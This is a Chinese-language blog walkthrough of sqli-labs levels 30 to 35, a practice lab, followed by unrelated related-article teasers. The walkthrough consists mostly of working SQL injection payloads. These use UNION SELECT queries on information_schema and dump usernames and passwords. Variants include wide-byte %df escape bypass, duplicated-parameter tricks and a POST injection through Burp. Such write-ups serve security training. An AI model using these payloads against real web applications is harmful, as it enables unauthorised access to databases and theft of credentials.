sqlilabs第三十关到第三十五关靶场攻略

devtools/2024/12/23 3:25:03/

第三十关

第三十关和二十九关差不多,将单引号换成双引号

查询表名,字段名,数据

?id=1&id=-2" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=1&id=-2" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

?id=1&id=-2" union select 1,group_concat(password,username),3 from users--+

第三十一关

查询数据库

查询表名

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

普通的联合注入( 如果不行,可以尝试一下?id=1&id=-1") )

照正常流程走就好了

第三十二关(宽字节注入)

在1后面加%df让他成为一个字符

?id=-1%df' union select 1,2,database()--+

后面还是联合查询一样的流程

第三十三关

跟三十二一样都是宽字节注入\

?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

第三十四关

这关还是宽字节注入,可以到是POST提交

我们到bp重放器进行注入

admin%df' union select 1,group_concat(table_name)from information_schema.tables where table_schema=database() #

继续联合注入就行

第三十五关

数字型的宽字节注入但是这关不需要%df

直接联合注入就拿下这关

?id=-1 union select 1,2,database()--+

?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database() #

?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273 #


http://www.ppmy.cn/devtools/144566.html

相关文章

【YashanDB知识库】如何处理yasql输入交互模式下单行字符总量超过限制4000字节

现象 在yasql执行sql语句后报错:YASQL-00021 input line overflow (>4000 byte at line 4) 原因 yasql在交互模式模式下单行字符总量限制4000字节,超出该限制即报错。 交互式模式下,yasql会显示一个提示符,通常是 SQL>…

C语言数据库管理系统示例:文件操作、内存管理、错误处理与动态数据库设计 栈和堆的内存分配

C语言的管理数据库完整的小型系统示例&#xff1a; #include <stdio.h> // 引入标准输入输出库&#xff0c;提供printf等功能 #include <assert.h> // 引入断言库&#xff0c;用于调试时检查条件 #include <stdlib.h> // 引入标准库&#xf…

微信小程序-生成骨架屏

文章目录 微信小程序-生成骨架屏概述步骤 微信小程序-生成骨架屏 概述 骨架屏是页面的一个空白版本&#xff0c;通常会在页面完全渲染之前&#xff0c;通过一些灰色的区块大致勾勒出轮廓&#xff0c;待数据加载完成后&#xff0c;再替换成真实的内容。微信小程序提供了自动生…

基于Spring Boot的网络海鲜市场系统

一、系统背景与目的 随着互联网的快速发展和电子商务的普及&#xff0c;海鲜市场也逐渐向线上转移。传统的海鲜销售方式存在信息不对称、交易效率低、管理成本高等问题。为了解决这些问题&#xff0c;基于Spring Boot的网络海鲜市场系统应运而生。该系统旨在通过线上平台&…

基于DockerCompose搭建Redis主从哨兵模式

linux目录结构 内网配置 哨兵配置文件如下&#xff0c;创建3个哨兵配置文件 # sentinel26379.conf sentinel26380.conf sentinel26381.conf 内容如下 protected-mode no sentinel monitor mymaster redis-master 6379 2 sentinel down-after-milliseconds mymaster 60000 s…

Python发送带key的kafka消息

在Python中发送带有键&#xff08;key&#xff09;的Kafka消息&#xff0c;通常会使用confluent-kafka或kafka-python这样的库。这里我将分别展示如何使用这两个库来实现这个功能。 ### 使用 confluent-kafka 首先&#xff0c;确保你已经安装了confluent-kafka库。如果没有安装…

面试小札:闪电五连鞭_6

1. synchronized和ReentrantLock的区别 - 实现机制 - synchronized 是Java中的关键字&#xff0c;它是基于JVM内部实现的。JVM会自动对 synchronized 修饰的方法或代码块进行加锁和解锁操作。例如&#xff1a; public class SynchronizedExample { public synchronized …

【单片机原理】第1章 微机基础知识,运算器,控制器,寄存器,微机工作过程,数制转换

关注作者了解更多 我的其他CSDN专栏 过程控制系统 工程测试技术 虚拟仪器技术 可编程控制器 工业现场总线 数字图像处理 智能控制 传感器技术 嵌入式系统 复变函数与积分变换 单片机原理 线性代数 大学物理 热工与工程流体力学 数字信号处理 光电融合集成电路…